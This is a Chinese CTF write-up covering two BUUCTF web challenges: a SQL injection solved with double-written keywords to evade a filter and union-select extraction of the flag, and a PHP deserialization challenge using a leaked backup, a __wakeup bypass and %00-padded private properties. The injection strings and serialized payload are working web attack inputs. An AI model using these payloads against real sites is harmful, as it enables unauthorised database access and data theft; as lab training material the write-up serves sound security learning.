BUUCTF——WEB(6)

Bug.ink2026-01-09 9:31

目录

[[极客大挑战 2019]BabySQL 1](#[极客大挑战 2019]BabySQL 1)

sql注入

[[极客大挑战 2019]PHP 1](#[极客大挑战 2019]PHP 1)

php反序列化

[极客大挑战 2019]BabySQL 1

sql注入

尝试万能密码

复制代码 
1' or 1=1#

123

尝试联合查询

复制代码 
1' order by 1#

123

or 和 by都被过滤

尝试双写绕过

复制代码 
1' oorrder bbyy 2#

123

双写绕过可行

联合查询深度利用

尝试

复制代码 
1' oorrder bbyy 4#

123

出现报错

则所查询的数据表有三列

构造查询

复制代码 
1' union select 1,2,3#

123

union select 被过滤

再次尝试双写

复制代码 
1' uunionnion sselectelect 1,2,3#

123

根据回显,查找数据

复制代码 
1' uunionnion sselectelect 1,database(),version()#

123
复制代码 
1' uunionnion sselectelect 1,database(),group_concat(table_name) from information_schema.tables where table_schema=geek#

123

报错,因为字符中的or被过滤,

经过测试where,from都被过滤

继续双写

复制代码 
1' uunionnion sselectelect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

123

好像在当前查询数据库中,没有相关表,

继续查看数据库

复制代码 
1' uunionnion sselectelect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

123

有一个ctf数据库,

尝试注入ctf数据库中的数据表

复制代码 
1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

123

数据表为Flag表,查询列名

复制代码 
1' uunionnion sselectelect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf'#

123

Flag表中又一个字段flag

查询flag字段数据

复制代码 
1' uunionnion sselectelect 1,2,group_concat(flag) frfromom ctf.Flag#

123

[极客大挑战 2019]PHP 1

php反序列化

网站备份

进行目录爆破,查找备份文件

访问www.zip发现源码泄露

提交查看是错误的

查看index.php

存在反序列化函数 unserialize()

unserialize() 是 PHP 中专门用于 "反序列化" 的函数,作用是将序列化后的字符串还原为 PHP 对象 / 数据结构,这是反序列化操作的标志性函数。

$select = $_GET['select']; 表示:$select 的值是从 URL 的 GET 参数(?select=xxx)中获取的,用户可以自定义传入任意内容

包含class.php并且有一个反序列化点

核心逻辑与漏洞点分析

先拆解 Name 类的关键魔术方法和限制条件,明确利用目标:

关键绕过技巧

  • PHP 存在一个经典漏洞(PHP < 5.6.25/7.0.10):当序列化字符串中声明的属性数量 > 类实际的属性数量 时,__wakeup 不会被触发。
  • 本类实际属性数是 2($username$password),只需把序列化字符串中的属性数从 2 改成 3 即可绕过。

构造反序列化 Payload

查看class.php

思路:username值为admin,password值为100,可以输出flag

构造反序列化payload

复制代码 
<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$a= new Name();
$res=serialize(@$a);   
echo $res
?>

输出反序列化字符串

复制代码 
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

这里我们发现Nameusername与前面的14不对应,少了两个字符,而Namepassword也是少了两个字符,这是因为username和password变量是private类型,变量中的类名前后会有空白符

Name前后需要添加%00

同时要绕过_wakeup(),还要将Name后面的数字修改为大于2的数。

结果:

复制代码 
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

get传参:

复制代码 
?select=O:4:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
相关推荐
李广坤2 天前
MySQL 大表字段变更实践(改名 + 改类型 + 改长度)
数据库
爱可生开源社区3 天前
2026 年,优秀的 DBA 需要具备哪些素质?
数据库·人工智能·dba
随逸1773 天前
《从零搭建NestJS项目》
数据库·typescript
加号33 天前
windows系统下mysql多源数据库同步部署
数据库·windows·mysql
シ風箏3 天前
MySQL【部署 04】Docker部署 MySQL8.0.32 版本(网盘镜像及启动命令分享)
数据库·mysql·docker
李慕婉学姐4 天前
Springboot智慧社区系统设计与开发6n99s526(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·spring boot·后端
百锦再4 天前
Django实现接口token检测的实现方案
数据库·python·django·sqlite·flask·fastapi·pip
tryCbest4 天前
数据库SQL学习
数据库·sql
jnrjian4 天前
ORA-01017 查找机器名 用户名 以及library cache lock 参数含义
数据库·oracle
十月南城4 天前
数据湖技术对比——Iceberg、Hudi、Delta的表格格式与维护策略
大数据·数据库·数据仓库·hive·hadoop·spark
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04OpenClaw + 飞书(Feishu)环境搭建指南05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06OpenClaw优化飞书API 额度已耗尽问题07Window 10部署openclaw报错node.exe : npm error code 12808Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09OpenClaw 接入阿里云百炼 Coding Plan 指南10UV安装并设置国内源